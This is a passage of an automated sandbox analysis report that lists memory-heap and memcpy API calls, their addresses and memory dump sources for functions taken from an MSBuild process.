                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CAC0A4D), ref: 6CB1B5EA
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CAC0A4D), ref: 6CB1B623
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CAC0A4D), ref: 6CB1B66C
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CAC0A4D), ref: 6CB1B67F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: malloc$free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CAEF611
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAEF623
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CAEF652
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAEF668
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%